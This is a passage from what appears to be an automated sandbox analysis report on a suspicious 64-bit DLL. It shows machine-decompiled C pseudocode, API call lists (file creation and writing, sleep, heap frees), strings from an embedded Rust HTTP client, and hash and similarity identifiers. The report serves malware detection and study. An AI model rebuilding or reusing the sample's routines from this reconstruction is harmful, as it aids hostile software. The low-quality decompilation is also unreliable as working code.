				if ((_t412 << 0x00000020 | _t306) << 4 == 0) goto 0xf304e4df;
				HeapFree(??, ??, ??);
				_t364 =  *((intOrPtr*)(_t374 + 0x68));
				if ( *(_t374 + 0x50) == 0) goto 0xf304e508;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t374 + 0x58)) == 0) goto 0xf304e522;
				HeapFree(??, ??, ??); // executed
				 *((short*)( *((intOrPtr*)(_t374 + 0x60)))) = 0;
				if (_t364 == 0) goto 0xf304e53e;
				HeapFree(??, ??, ??);
				if ( *(_t374 + 0x78) == 0) goto 0xf304e558;
				HeapFree(??, ??, ??);
				if ( *(_t374 + 0x80) == 0) goto 0xf304e57f;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t374 + 0xe0)) == 0) goto 0xf304e5a1;
				HeapFree(??, ??, ??);
				sil = 1;
				if ( *((long long*)(_t374 + 0x88)) != 0) goto 0xf304e6b1;
				goto 0xf304e6c5;
				if ( *(_t374 + 0x50) == 0) goto 0xf304e5dc;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t374 + 0x58)) == 0) goto 0xf304e5f8;
				HeapFree(??, ??, ??);
				 *((short*)( *((intOrPtr*)(_t374 + 0x60)))) = 0;
				if ( *((intOrPtr*)(_t374 + 0x68)) == 0) goto 0xf304e614;
				HeapFree(??, ??, ??);
				if ( *(_t374 + 0x78) == 0) goto 0xf304e62e;
				HeapFree(??, ??, ??);
				if ( *(_t374 + 0x80) == 0) goto 0xf304e655;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t374 + 0xe0)) == 0) goto 0xf304e677;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t374 + 0x88)) == 0) goto 0xf304e696;
				HeapFree(??, ??, ??);
				if (_t261 == 0xffffffff) goto 0xf304e6a0;
				goto 0xf304e6c5;
				if ( *((long long*)(_t364 + 8)) == 0) goto 0xf304e69c;
				 *((long long*)(_t374 + 0x40)) =  *_t364;
				HeapFree(??, ??, ??);
				if ( *((long long*)( *((intOrPtr*)(_t374 + 0x90)) + 8)) == 0) goto 0xf304e6de;
				HeapFree(??, ??, ??);
				return 0;
			}

0x7fef304e007
0x7fef304e00f
0x7fef304e012
0x7fef304e019
0x7fef304e020
0x7fef304e02b
0x7fef304e030
0x7fef304e033
0x7fef304e03d
0x7fef304e041
0x7fef304e04a
0x7fef304e058
0x7fef304e05e
0x7fef304e066
0x7fef304e06b
0x7fef304e079
0x7fef304e07f
0x7fef304e082
0x7fef304e08e
0x7fef304e099
0x7fef304e09e
0x7fef304e0a1
0x7fef304e0ab
0x7fef304e0af
0x7fef304e0b8
0x7fef304e0bd
0x7fef304e0c5
0x7fef304e0cd
0x7fef304e0d3
0x7fef304e0db
0x7fef304e0e0
0x7fef304e0ee
0x7fef304e0f4
0x7fef304e107
0x7fef304e10c
0x7fef304e110
0x7fef304e114
0x7fef304e118
0x7fef304e128
0x7fef304e130
0x7fef304e13c
0x7fef304e141
0x7fef304e144
0x7fef304e14c
0x7fef304e157
0x7fef304e15a
0x7fef304e175
0x7fef304e17b
0x7fef304e1a6
0x7fef304e1ae
0x7fef304e1b6
0x7fef304e1b9
0x7fef304e1bd
0x7fef304e1c7
0x7fef304e1ca
0x7fef304e1f0
0x7fef304e21f
0x7fef304e227
0x7fef304e22c
0x7fef304e22f
0x7fef304e233
0x7fef304e236
0x7fef304e23d
0x7fef304e243
0x7fef304e24b
0x7fef304e253
0x7fef304e25a
0x7fef304e263
0x7fef304e268
0x7fef304e270
0x7fef304e27a
0x7fef304e28b
0x7fef304e292
0x7fef304e297
0x7fef304e29a
0x7fef304e29f
0x7fef304e2a6
0x7fef304e2ad
0x7fef304e2b1
0x7fef304e2b8
0x7fef304e2bb
0x7fef304e2c8
0x7fef304e2d4
0x7fef304e2d9
0x7fef304e2e1
0x7fef304e2e4
0x7fef304e2f4
0x7fef304e2f9
0x7fef304e2fd
0x7fef304e308
0x7fef304e30b
0x7fef304e314
0x7fef304e32a
0x7fef304e333
0x7fef304e33b
0x7fef304e34b
0x7fef304e34e
0x7fef304e351
0x7fef304e357
0x7fef304e35b
0x7fef304e363
0x7fef304e369
0x7fef304e36e
0x7fef304e373
0x7fef304e37e
0x7fef304e385
0x7fef304e395
0x7fef304e39d
0x7fef304e3de
0x7fef304e3e6
0x7fef304e3eb
0x7fef304e3ee
0x7fef304e3f1
0x7fef304e3f8
0x7fef304e401
0x7fef304e410
0x7fef304e416
0x7fef304e42a
0x7fef304e432
0x7fef304e435
0x7fef304e43c
0x7fef304e445
0x7fef304e452
0x7fef304e45a
0x7fef304e462
0x7fef304e469
0x7fef304e46d
0x7fef304e49c
0x7fef304e4a7
0x7fef304e4aa
0x7fef304e4ac
0x7fef304e4b3
0x7fef304e4bc
0x7fef304e4c6
0x7fef304e4cb
0x7fef304e4d9
0x7fef304e4e5
0x7fef304e4f4
0x7fef304e502
0x7fef304e50e
0x7fef304e51c
0x7fef304e522
0x7fef304e52a
0x7fef304e538
0x7fef304e544
0x7fef304e552
0x7fef304e569
0x7fef304e579
0x7fef304e588
0x7fef304e59b
0x7fef304e5a1
0x7fef304e5ad
0x7fef304e5b3
0x7fef304e5c8
0x7fef304e5d6
0x7fef304e5e2
0x7fef304e5f2
0x7fef304e5f8
0x7fef304e600
0x7fef304e60e
0x7fef304e61a
0x7fef304e628
0x7fef304e63f
0x7fef304e64f
0x7fef304e65e
0x7fef304e671
0x7fef304e680
0x7fef304e690
0x7fef304e69a
0x7fef304e69e
0x7fef304e6a5
0x7fef304e6aa
0x7fef304e6bf
0x7fef304e6ca
0x7fef304e6d8
0x7fef304e6f3

APIs

HeapFree.KERNEL32 ref: 000007FEF304E079
HeapFree.KERNEL32 ref: 000007FEF304E0EE
CreateFileW.KERNELBASE ref: 000007FEF304E351
WriteFile.KERNELBASE ref: 000007FEF304E435
SleepEx.KERNEL32 ref: 000007FEF304E4C6
HeapFree.KERNEL32 ref: 000007FEF304E4D9
HeapFree.KERNEL32 ref: 000007FEF304E502
HeapFree.KERNEL32 ref: 000007FEF304E51C
HeapFree.KERNEL32 ref: 000007FEF304E538
HeapFree.KERNEL32 ref: 000007FEF304E552
HeapFree.KERNEL32 ref: 000007FEF304E579
HeapFree.KERNEL32 ref: 000007FEF304E59B
HeapFree.KERNEL32 ref: 000007FEF304E5D6
HeapFree.KERNEL32 ref: 000007FEF304E5F2
HeapFree.KERNEL32 ref: 000007FEF304E60E
HeapFree.KERNEL32 ref: 000007FEF304E628
HeapFree.KERNEL32 ref: 000007FEF304E64F
HeapFree.KERNEL32 ref: 000007FEF304E671
HeapFree.KERNEL32 ref: 000007FEF304E690
HeapFree.KERNEL32 ref: 000007FEF304E6BF
HeapFree.KERNEL32 ref: 000007FEF304E6D8

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304E121

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$File$CreateSleepWrite
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 3756411922-1586615424
Opcode ID: 556f268da89fed71d5727651ff0c312ae32ab2a881204ce1e34201805337150c
Instruction ID: de6227b5fe82a9cecc0777f801bd6ffd4f08851931669559c9b4c075c7a05430
Opcode Fuzzy Hash: 556f268da89fed71d5727651ff0c312ae32ab2a881204ce1e34201805337150c
Instruction Fuzzy Hash: 32127276A08A8289E7A4DB12E8443A973E2F789B94F448137CE8D477B9DF3CD545E300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B96A4 Relevance: 34.3, APIs: 10, Strings: 12, Instructions: 1345
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E000007FE7FEF30B96A4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __ebp, void* __esp, signed int* __rcx, void* __rdx, long long __r8, void* __r9) {
				char _v136;
				void* _v148;
				void* _v224;
				void* _v236;
				char _v395;
				char _v396;
				char _v432;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v460;
				long long _v716;
				char _v723;
				char _v724;
				void* _v760;
				long long _v768;
				char _v772;
				char _v776;
				intOrPtr _v780;
				char _v788;
				long long _v824;
				long long _v836;
				char _v852;
				void* _v860;
				long long _v868;
				long long _v904;
				void* _v916;
				long long _v1044;
				long long _v1052;
				long long _v1060;
				long long _v1072;
				long long _v1084;
				char _v1088;
				intOrPtr _v1092;
				long long _v1096;
				char _v1100;
				signed int _v1108;
				long long _v1120;
				void* _v1132;
				signed short _v1140;
				signed int* _v1144;
				long long _v1148;
				void* _v1156;
				signed int* _v1160;
				void* _v1164;
				intOrPtr _v1172;
				int _t171;
				void* _t198;
				void* _t243;
				signed int* _t250;
				void* _t252;
				void* _t253;
				long long _t254;
				void* _t255;
				long long* _t260;
				long long* _t261;
				long long _t262;
				long long _t265;
				signed long long _t266;
				long long _t267;
				long long _t268;
				long long _t271;
				intOrPtr _t276;
				signed int* _t277;
				signed int* _t278;
				signed long long _t291;
				char _t294;
				long long _t299;
				signed int* _t310;
				signed long long _t313;
				long long* _t315;
				signed int** _t317;
				signed long long _t321;
				signed int* _t325;
				char* _t327;
				intOrPtr* _t329;
				long long* _t335;
				intOrPtr* _t336;
				intOrPtr* _t339;
				char* _t342;
				char* _t344;
				long long _t352;
				signed int _t367;
				intOrPtr _t375;
				signed int* _t379;
				signed int* _t380;
				char _t386;
				signed long long _t389;
				signed int* _t391;

				_t198 = __edi;
				_t391 = __rcx;
				_t250 =  &_v136;
				_t250[0xc] =  *((intOrPtr*)(__rdx + 0x30));
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movups xmm2, [edx+0x20]");
				asm("movaps [eax+0x20], xmm2");
				asm("movaps [eax+0x10], xmm1");
				asm("movaps [eax], xmm0");
				_t250[0xe] =  *((intOrPtr*)(__r8 + 0x98));
				_t250[0x10] =  *(__r8 + 0xa0);
				r9d = 0xf;
				E000007FE7FEF30BB020(); // executed
				_t379 = _v776;
				if (_t379 == 0) goto 0xf30b9848;
				_v1120 = __r8;
				_t335 =  &_v776;
				E000007FE7FEF3055320(_t335, _t379,  *((intOrPtr*)(_t335 + 0x10)), __r9);
				if ( *_t335 == 0) goto 0xf30b97eb;
				if (_v760 == 2) goto 0xf30b97eb;
				_t336 =  &_v776;
				_t310 = _t379;
				E000007FE7FEF30515F0(_t250, _t336, _t310,  *((intOrPtr*)(_t335 + 0x10)));
				_t276 =  *((intOrPtr*)(_t336 + 0x10));
				if ( *_t336 != 0) goto 0xf30b9789;
				E000007FE7FEF30694DF(0, _t250, _t276);
				_t325 = _t310;
				E000007FE7FEF30F1E10();
				if (_v776 == 0) goto 0xf30b97ce;
				if (_v768 == 0) goto 0xf30b97ce;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t335 + 8)) == 0) goto 0xf30b97e5;
				HeapFree(??, ??, ??);
				_t380 = _t250;
				_v1160 = _t325;
				_v1144 = _t380;
				if (_t276 - 8 < 0) goto 0xf30b988b;
				_t21 =  &(_t380[1]); // 0x7
				_t313 = _t21 & 0xfffffff8;
				_t252 = _t313 - _t380;
				if (_t252 - _t276 > 0) goto 0xf30b988b;
				if (( *_t380 & 0x80808080) != 0) goto 0xf30b98af;
				_t253 =  ==  ? _t313 : _t252;
				if (_t253 - _t276 - 8 >= 0) goto 0xf30b98a4;
				if (( *(_t380 + _t253) & 0x80808080) != 0) goto 0xf30b98af;
				_t254 = _t253 + 8;
				goto 0xf30b9836;
				_t315 =  &_v776;
				_t367 =  *((intOrPtr*)(_t315 + 8));
				 *_t315 = _t254;
				 *(_t315 + 0x44) = 2;
				 *((long long*)(_t315 + 0x70)) = _t254;
				 *((char*)(_t315 + 0x80)) = 8;
				 *((long long*)(_t315 + 0xc8)) = 2;
				_t291 =  &(_t391[2]);
				E000007FE7FEF30B111D(_t198, __esi, __esp, _t254, _t291, _t315, _t367);
				 *_t391 = 1;
				goto 0xf30b9eb1;
				if (_t276 == _t254) goto 0xf30b9990;
				_t255 = _t254 + 1;
				if ( *((char*)(_t380 + _t254)) >= 0) goto 0xf30b988d;
				goto 0xf30b98af;
				if (( *(_t380 + _t315) & _t291) == 0) goto 0xf30b9990;
				_t277 = _t391;
				E000007FE7FEF30694DF(0, _t255, _t291);
				 *((long long*)(_t255 + 0xd)) = 0x4120746f;
				asm("movups xmm0, [0x927dd]");
				asm("movups [esi], xmm0");
				asm("movups xmm0, [esp+0x2f8]");
				asm("movups xmm1, [esp+0x308]");
				asm("movups xmm2, [esp+0x314]");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xd0], xmm1");
				asm("movups [esp+0xdc], xmm2");
				asm("movups xmm0, [esp+0x160]");
				asm("movups xmm1, [esp+0x170]");
				asm("movaps [esp+0x110], xmm0");
				asm("movaps [esp+0x120], xmm1");
				_v904 = _v824;
				r8d = 0x47;
				E000007FE7FEF30F1E10();
				asm("movups xmm0, [esp+0x78]");
				asm("movaps [esp+0x60], xmm0");
				_v1096 = _v1072;
				r15d = 2;
				r13w = 0x15;
				goto 0xf30b9dcc;
				_t317 =  &_v432;
				 *(_t317 - 0x10) = _t325;
				 *(_t317 - 8) = _t277;
				 *_t317 = _t380;
				_t317[1] = _t277;
				_t317[2] = _t325;
				_t317[3] = _t277;
				_t317[4] = 1;
				_t317[5] = 0x20;
				_t317[6] = 1;
				_t317[7] = 2;
				_t339 =  &_v776;
				E000007FE7FEF30A6A7C(_t339, _t317);
				if ( *_t339 == _t325) goto 0xf30b9c5c;
				_t260 = _v760;
				_t294 = _v448;
				_v448 = _t260;
				E000007FE7FEF305A520();
				if (_t260 == 0) goto 0xf30bafad;
				_t352 = _t260;
				 *_t260 = _t294 + _t380;
				 *((long long*)(_t260 + 8)) = _v768 - _t294;
				_t261 =  &_v1088;
				 *_t261 = _t352;
				 *((long long*)(_t261 + 8)) = 4;
				 *((long long*)(_t261 + 0x10)) = 1;
				_t327 =  &_v776;
				_t342 =  &_v448;
				memcpy(0, __esi, 0xa);
				_t262 = _v716;
				if (_t262 == 1) goto 0xf30b9af1;
				if (_t262 == 0) goto 0xf30b9b75;
				_v716 = _t262 - 1;
				if (_v723 != 0) goto 0xf30b9b75;
				E000007FE7FEF30A6A7C( &_v868,  &_v772);
				if (_v868 == 0) goto 0xf30b9afd;
				_v788 = _v852;
				goto 0xf30b9b39;
				_v716 = 0;
				if (_v723 != 0) goto 0xf30b9b75;
				_t386 = _v788;
				_t375 = _v780;
				if (_v724 != 0) goto 0xf30b9b26;
				if (_t375 == _t386) goto 0xf30b9b75;
				_v723 = 1;
				if (_t342 == _v1092) goto 0xf30b9b61;
				 *((long long*)(_t352 + _t327 - 8)) = _t386 + _v772;
				 *((long long*)(_t352 + _t327)) = _t375 - _t386;
				_v1084 = _t342 + 1;
				goto 0xf30b9a71;
				E000007FE7FEF30FE977(_t342 - _v1092,  &_v1100, _t342 + 1);
				goto 0xf30b9b43;
				asm("movups xmm0, [esp+0x78]");
				asm("movaps [esp+0xa0], xmm0");
				_t265 = _v1084;
				_v1044 = _t265;
				if (_t265 != 2) goto 0xf30b9bea;
				if (_v1052 != 2) goto 0xf30b9bbc;
				_t344 =  &_v1060;
				E000007FE7FEF30B1D0D(_v1052 - 2, _t344, _t342 + 1);
				_t266 =  *((intOrPtr*)(_t344 + 0x10));
				_t299 = _v1060;
				_t321 = _t266 << 4;
				 *((long long*)(_t299 + _t321)) = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t299 + _t321 + 8)) = 0;
				_t267 = _t266 + 1;
				_v1044 = _t267;
				if (_t267 != 3) goto 0xf30b9ca4;
				_t329 = _v1060;
				_t243 =  *((intOrPtr*)(_t329 + 8)) - 5;
				if (_t243 < 0) goto 0xf30b9c1f;
				_t268 =  *_t329;
				if (_t243 == 0) goto 0xf30b9ef3;
				_v1148 = _t268;
				E000007FE7FEF30694DF(0, _t268,  *((intOrPtr*)(_t329 + 8)));
				 *((long long*)(_t268 + 0x1d)) = 0x48206874;
				asm("movups xmm0, [0x924a5]");
				asm("movups [esi], xmm0");
				asm("movups xmm0, [0x924ab]");
				goto 0xf30b9cdc;
				if (_v395 != 0) goto 0xf30b9c8d;
				if (_v396 != 0) goto 0xf30b9edb;
				if (_v452 != _v460) goto 0xf30b9edb;
				_v1060 = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0xa8], xmm0");
				_v1148 = 0x48206874;
				E000007FE7FEF30694DF(0, 0x48206874,  *((intOrPtr*)(_t329 + 8)));
				_t389 = _t321;
				 *0x2F50545448206891 = 0x20737574;
				asm("movups xmm0, [0x923fb]");
				asm("movups [esi], xmm0");
				asm("movups xmm0, [0x92401]");
				asm("movups [esi+0x10], xmm0");
				asm("movups xmm0, [esp+0x2f8]");
				asm("movups xmm1, [esp+0x308]");
				asm("movups xmm2, [esp+0x314]");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xd0], xmm1");
				asm("movups [esp+0xdc], xmm2");
				asm("movups xmm0, [esp+0x160]");
				asm("movups xmm1, [esp+0x170]");
				asm("movaps [esp+0x110], xmm0");
				asm("movaps [esp+0x120], xmm1");
				_t271 = _v836;
				_v916 = _t271;
				r8d = 0x47;
				E000007FE7FEF30F1E10();
				_v1164 = _t271;
				_v1140 = 0x25;
				_t278 = _t391;
				if (_v1052 == 0) goto 0xf30b9db9;
				r15d = 6;
				HeapFree(??, ??, ??);
				r13d = _v1140 & 0x0000ffff;
				r14d = 1;
				_t278[6] = 2;
				_t278[7] = 2;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps xmm1, [esp+0xd0]");
				asm("movups [ebx+0x20], xmm0");
				asm("movups [ebx+0x30], xmm1");
				asm("movups xmm0, [esp+0xdc]");
				asm("movups [ebx+0x3c], xmm0");
				_t278[0x13] = 2;
				asm("movaps xmm0, [esp+0x110]");
				asm("movaps xmm1, [esp+0x120]");
				asm("movups [ebx+0x50], xmm0");
				asm("movups [ebx+0x60], xmm1");
				_t278[0x1c] = _v916;
				_t278[0x1e] =  &_v788;
				_t278[0x20] = _t367;
				_t278[0x22] = r15d;
				r8d = 0x47;
				E000007FE7FEF30F1E10();
				asm("movaps xmm0, [esp+0x60]");
				asm("movups [ebx+0xd8], xmm0");
				_t278[0x3a] = _v1108;
				_t278[2] = _t389 | 0x48206874 >> 0x00000010 << 0x00000010;
				_t278[4] = _t389;
				_t278[6] = r13w;
				_t278[0x34] = _v1164;
				 *_t278 = 1;
				if (_v1172 == 0) goto 0xf30b9eb1;
				_t171 = HeapFree(??, ??, ??);
				E000007FE7FEF30A7FF1();
				E000007FE7FEF30A7A75();
				return _t171;
			}

0x7fef30b96a4
0x7fef30b96ba
0x7fef30b96c1
0x7fef30b96c9
0x7fef30b96cd
0x7fef30b96d0
0x7fef30b96d4
0x7fef30b96d8
0x7fef30b96dc
0x7fef30b96e0
0x7fef30b96f1
0x7fef30b96f5
0x7fef30b9707
0x7fef30b9713
0x7fef30b9718
0x7fef30b971e
0x7fef30b9724
0x7fef30b9729
0x7fef30b9742
0x7fef30b974b
0x7fef30b9759
0x7fef30b975f
0x7fef30b976a
0x7fef30b9770
0x7fef30b9778
0x7fef30b977f
0x7fef30b978e
0x7fef30b9796
0x7fef30b97a2
0x7fef30b97b2
0x7fef30b97bd
0x7fef30b97c8
0x7fef30b97d1
0x7fef30b97df
0x7fef30b97e8
0x7fef30b97ef
0x7fef30b97f4
0x7fef30b97f9
0x7fef30b97ff
0x7fef30b9803
0x7fef30b980a
0x7fef30b9810
0x7fef30b9820
0x7fef30b982e
0x7fef30b9839
0x7fef30b9840
0x7fef30b9842
0x7fef30b9846
0x7fef30b9848
0x7fef30b9850
0x7fef30b9856
0x7fef30b9859
0x7fef30b9860
0x7fef30b9864
0x7fef30b986b
0x7fef30b9876
0x7fef30b987a
0x7fef30b987f
0x7fef30b9886
0x7fef30b9890
0x7fef30b989c
0x7fef30b98a0
0x7fef30b98a2
0x7fef30b98a9
0x7fef30b98af
0x7fef30b98bb
0x7fef30b98d0
0x7fef30b98d4
0x7fef30b98db
0x7fef30b98e5
0x7fef30b98ed
0x7fef30b98f5
0x7fef30b98fd
0x7fef30b9905
0x7fef30b990d
0x7fef30b9915
0x7fef30b991d
0x7fef30b9925
0x7fef30b992d
0x7fef30b993d
0x7fef30b9955
0x7fef30b995b
0x7fef30b9960
0x7fef30b9965
0x7fef30b9972
0x7fef30b9977
0x7fef30b997d
0x7fef30b998b
0x7fef30b9992
0x7fef30b999a
0x7fef30b999e
0x7fef30b99a2
0x7fef30b99a5
0x7fef30b99a9
0x7fef30b99ad
0x7fef30b99b1
0x7fef30b99c3
0x7fef30b99c7
0x7fef30b99cd
0x7fef30b99d5
0x7fef30b99e0
0x7fef30b99e8
0x7fef30b99f6
0x7fef30b99fe
0x7fef30b9a0d
0x7fef30b9a1f
0x7fef30b9a27
0x7fef30b9a2d
0x7fef30b9a30
0x7fef30b9a33
0x7fef30b9a37
0x7fef30b9a3c
0x7fef30b9a3f
0x7fef30b9a47
0x7fef30b9a4f
0x7fef30b9a57
0x7fef30b9a64
0x7fef30b9a71
0x7fef30b9a7d
0x7fef30b9a82
0x7fef30b9a8b
0x7fef30b9a9b
0x7fef30b9ab9
0x7fef30b9ac7
0x7fef30b9ae7
0x7fef30b9aef
0x7fef30b9af1
0x7fef30b9b05
0x7fef30b9b0f
0x7fef30b9b17
0x7fef30b9b1f
0x7fef30b9b24
0x7fef30b9b26
0x7fef30b9b41
0x7fef30b9b43
0x7fef30b9b48
0x7fef30b9b50
0x7fef30b9b5c
0x7fef30b9b69
0x7fef30b9b73
0x7fef30b9b75
0x7fef30b9b7a
0x7fef30b9b82
0x7fef30b9b8a
0x7fef30b9b96
0x7fef30b9ba6
0x7fef30b9ba8
0x7fef30b9bb3
0x7fef30b9bb8
0x7fef30b9bbc
0x7fef30b9bc7
0x7fef30b9bd2
0x7fef30b9bd6
0x7fef30b9bdf
0x7fef30b9be2
0x7fef30b9bee
0x7fef30b9bf4
0x7fef30b9c00
0x7fef30b9c04
0x7fef30b9c06
0x7fef30b9c19
0x7fef30b9c21
0x7fef30b9c2d
0x7fef30b9c42
0x7fef30b9c46
0x7fef30b9c4d
0x7fef30b9c50
0x7fef30b9c57
0x7fef30b9c64
0x7fef30b9c7e
0x7fef30b9c87
0x7fef30b9c8d
0x7fef30b9c99
0x7fef30b9c9c
0x7fef30b9ca6
0x7fef30b9cb2
0x7fef30b9cba
0x7fef30b9cc7
0x7fef30b9ccb
0x7fef30b9cd2
0x7fef30b9cd5
0x7fef30b9cdc
0x7fef30b9ce7
0x7fef30b9cef
0x7fef30b9cf7
0x7fef30b9cff
0x7fef30b9d07
0x7fef30b9d0f
0x7fef30b9d17
0x7fef30b9d1f
0x7fef30b9d27
0x7fef30b9d2f
0x7fef30b9d37
0x7fef30b9d3f
0x7fef30b9d57
0x7fef30b9d5d
0x7fef30b9d67
0x7fef30b9d79
0x7fef30b9d7e
0x7fef30b9d8a
0x7fef30b9d97
0x7fef30b9da8
0x7fef30b9dc6
0x7fef30b9dd0
0x7fef30b9dd7
0x7fef30b9dde
0x7fef30b9de2
0x7fef30b9dea
0x7fef30b9df2
0x7fef30b9df6
0x7fef30b9dfa
0x7fef30b9e02
0x7fef30b9e06
0x7fef30b9e09
0x7fef30b9e11
0x7fef30b9e19
0x7fef30b9e1d
0x7fef30b9e29
0x7fef30b9e2d
0x7fef30b9e31
0x7fef30b9e38
0x7fef30b9e4d
0x7fef30b9e53
0x7fef30b9e58
0x7fef30b9e5d
0x7fef30b9e69
0x7fef30b9e70
0x7fef30b9e74
0x7fef30b9e78
0x7fef30b9e7d
0x7fef30b9e84
0x7fef30b9e9d
0x7fef30b9eab
0x7fef30b9eb9
0x7fef30b9ec1
0x7fef30b9eda

APIs

HeapFree.KERNEL32 ref: 000007FEF30B97C8
HeapFree.KERNEL32 ref: 000007FEF30B97DF
HeapFree.KERNEL32 ref: 000007FEF30B9DA8
HeapFree.KERNEL32 ref: 000007FEF30B9EAB
HeapFree.KERNEL32 ref: 000007FEF30BA118

Part of subcall function 000007FEF30B111D: HeapFree.KERNEL32 ref: 000007FEF30B119E

Part of subcall function 000007FEF3073C6C: HeapFree.KERNEL32 ref: 000007FEF3073CA2

HeapFree.KERNEL32 ref: 000007FEF30BA434
HeapFree.KERNEL32 ref: 000007FEF30BA5A7
HeapFree.KERNEL32 ref: 000007FEF30BA5E4

Part of subcall function 000007FEF305A520: GetProcessHeap.KERNEL32(?,?,?,000007FEF3068FDD), ref: 000007FEF305A534

HeapFree.KERNEL32 ref: 000007FEF30BAEE5
HeapFree.KERNEL32 ref: 000007FEF30BAEF7

Strings

HTTP, xrefs: 000007FEF30B9C09
gzip, xrefs: 000007FEF30BA68C
content-lengthcontent-encoding, xrefs: 000007FEF30BA604
(, xrefs: 000007FEF30BAB5D
th HTTP/, xrefs: 000007FEF30B9C38
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30B9BCB
tus line, xrefs: 000007FEF30B9CBD
x-gz, xrefs: 000007FEF30BA881
HTTP/1.0connectiontransfer-encoding, xrefs: 000007FEF30BA83D
headOPTIONSTRACE. lib.rs\src\unit.rsreached max redirects (, xrefs: 000007FEF30BA998
ot ASCII, xrefs: 000007FEF30B98C6
failed to read exact buffer length from stream, xrefs: 000007FEF30BB003

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: Heap$Free$Process
String ID: ($HTTP$HTTP/1.0connectiontransfer-encoding$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$content-lengthcontent-encoding$failed to read exact buffer length from stream$gzip$headOPTIONSTRACE. lib.rs\src\unit.rsreached max redirects ($ot ASCII$th HTTP/$tus line$x-gz
API String ID: 2719409998-3950009276
Opcode ID: 6f332520c10bdfe569cbb132059e6a9282a6f995889c99c4d7eb86476370b586
Instruction ID: 485741d0218299424fd8383089fd9a5b027e9c8b7df4d6e110f3a4df8b6e0356
Opcode Fuzzy Hash: 6f332520c10bdfe569cbb132059e6a9282a6f995889c99c4d7eb86476370b586
Instruction Fuzzy Hash: 10E29232A0CBC589E7A18B15E4503EAB3A2F788784F449126DF8D53B69EF3CE585D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304BF20 Relevance: 33.0, APIs: 17, Strings: 4, Instructions: 1474
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E000007FE7FEF304BF20() {
				signed int _t429;
				intOrPtr _t446;
				void* _t447;
				signed int _t455;
				intOrPtr _t460;
				signed int _t461;
				signed int _t487;
				intOrPtr _t512;
				signed int _t546;
				signed int _t553;
				void* _t558;
				void* _t571;
				void* _t580;
				void* _t585;
				void* _t589;
				void* _t592;
				signed short _t594;
				void* _t600;
				void* _t609;
				long long _t620;
				void* _t625;
				void* _t664;
				signed int _t665;
				intOrPtr _t686;
				long long _t687;
				long long _t690;
				long long _t693;
				long long _t697;
				void* _t698;
				long long _t699;
				signed int* _t700;
				long long _t708;
				long long _t711;
				long long _t713;
				long long _t739;
				long long _t741;
				intOrPtr _t742;
				long long _t745;
				long long _t748;
				long long _t749;
				long long _t751;
				long long _t752;
				long long _t755;
				long long _t758;
				long long _t759;
				long long _t760;
				intOrPtr _t773;
				void* _t776;
				signed long long _t786;
				signed short _t797;
				long long* _t812;
				long long* _t822;
				long long _t825;
				long long _t828;
				long long _t830;
				long long _t831;
				intOrPtr _t833;
				long long* _t837;
				long long _t840;
				signed long long _t844;
				void* _t846;
				long long _t851;
				long long _t855;
				intOrPtr* _t859;
				long long _t866;
				void* _t867;
				intOrPtr* _t869;
				intOrPtr* _t885;
				intOrPtr _t887;
				void* _t889;
				long long _t890;
				void* _t891;
				signed short _t892;
				long long* _t895;
				intOrPtr _t900;
				signed long long _t901;
				long long _t902;
				long long _t904;
				long long _t908;
				void* _t909;
				intOrPtr _t910;
				intOrPtr _t914;
				intOrPtr* _t917;
				signed long long* _t926;
				long long* _t936;
				intOrPtr _t937;
				void* _t938;
				long long _t940;
				intOrPtr _t943;
				signed long long _t948;
				long long _t952;
				long long _t955;
				long long _t959;
				signed long long _t961;

				asm("movaps [esp+0x510], xmm6");
